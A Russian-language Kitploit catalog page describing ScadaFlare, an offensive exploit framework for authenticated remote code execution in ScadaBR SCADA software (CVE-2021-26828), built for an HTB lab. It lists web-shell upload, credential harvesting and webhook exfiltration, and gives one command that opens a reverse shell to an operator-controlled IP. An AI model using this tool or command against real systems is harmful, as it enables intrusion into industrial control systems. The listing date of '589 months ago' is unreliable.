Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-26828-Ultimate — ScadaFlare аутентифицированный RCE фреймворк эксплуатации для ScadaBR (CVE-2021-26828) OpenPLC ScadaBR | Kitploit
Инструменты/GitHubGitHub/ridpath/cve-2021-26828-ultimate
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияБезопасность SCADA/ICSЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubridpath/cve-2021-26828-ultimate

CVE-2021-26828-Ultimate

ScadaFlare аутентифицированный RCE фреймворк эксплуатации для ScadaBR (CVE-2021-26828) OpenPLC ScadaBR

589 месяцев назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

ScadaFlare - Набор инструментов для аутентифицированного RCE CVE-2021-26828

license: MIT tested-on: HTB Alchemy target: ScadaBR <1.1.0 platform: Linux/Windows

Модульный эксплойт аутентифицированного RCE, нацеленный на ScadaBR <1.1.0, расширенный для операций красных команд.

Демонстрация ScadaFlare

Возможности

  • Загрузка вооруженной оболочки .jsp через view_edit.shtm
  • Поддержка нагрузок для Linux и Windows
  • Поддержка прокси SOCKS5 / HTTP
  • Запуск обратной оболочки (стандартной или base64)
  • Модули перечисления (БД, учетные данные, Log4Shell и др.)
  • Экфильтрация через webhook (Slack / Discord)
  • Генерация скрипта ресурса Metasploit
  • Поддержка очистки (аварийное отключение)
  • Соответствие технике MITRE ATT&CK

    ФазаТехникаID
    Начальный доступ (после аутентификации)Допустимые учетные записиT1078
    ВыполнениеЭксплуатация публичного приложенияT1190
    Выполнение командВеб-оболочкаT1505.003
    Действия с привилегиямиИзменение веб-контентаT1505
    Доступ к учетным даннымУчетные данные в конфигурационных файлахT1552.001
    РазведкаОбнаружение удаленных системT1018
    ЭкфильтрацияЭкфильтрация через веб-сервисT1567.002
    Обход защитыТуннелирование через прокси и протоколыT1090

    CVE

    • CVE-2021-26828
    • Обнаружено Фелипе Оливейрой
    • Эксплойт улучшен и модуляризован

    Для чего это нужно

    Этот эксплойт был разработан при анализе сценария HTB Pro Lab: Alchemy. Изначальный PoC от Фелипе Оливейры был качественным, но:

    • Написан на Python 2
    • Не имел современных функций, таких как поддержка прокси, очистка оболочки, цепочки перечисления
    • Был сложен для расширения или интеграции в рабочие процессы красных команд

    ScadaFlare — это полная переработка на Python 3 с модульной поддержкой, несколькими стратегиями обхода, определением ОС с возможностью переопределения, интеграцией webhook, поддержкой SOCKS-прокси и цепочками перечисления для использования операторами в реальных условиях.

    Использование

    root@kitploit:~
    python3 scadaflare.py http://172.16.0.20:80 admin admin \
      --reverse-ip 10.10.14.44 --reverse-port 4445 \
      --verbose --cleanup
    

    Только законное и этическое использование

    ScadaFlare предназначен исключительно для:

    • Обучения этичному взлому
    • Тестирования SCADA-лабораторий
    • Оборонительных исследований и проверки уязвимостей

    Несанкционированное использование против реальных промышленных систем может:

    • Нарушить физические процессы
    • Привести к повреждениям или угрозам безопасности
    • Повлечь серьезные юридические последствия

    Используя этот инструмент, вы принимаете полную ответственность за:

    • Получение явного письменного разрешения
    • Работу только в одобренных средах

    Лицензия

    Лицензия MIT – см. LICENSE

    Скачать инструмент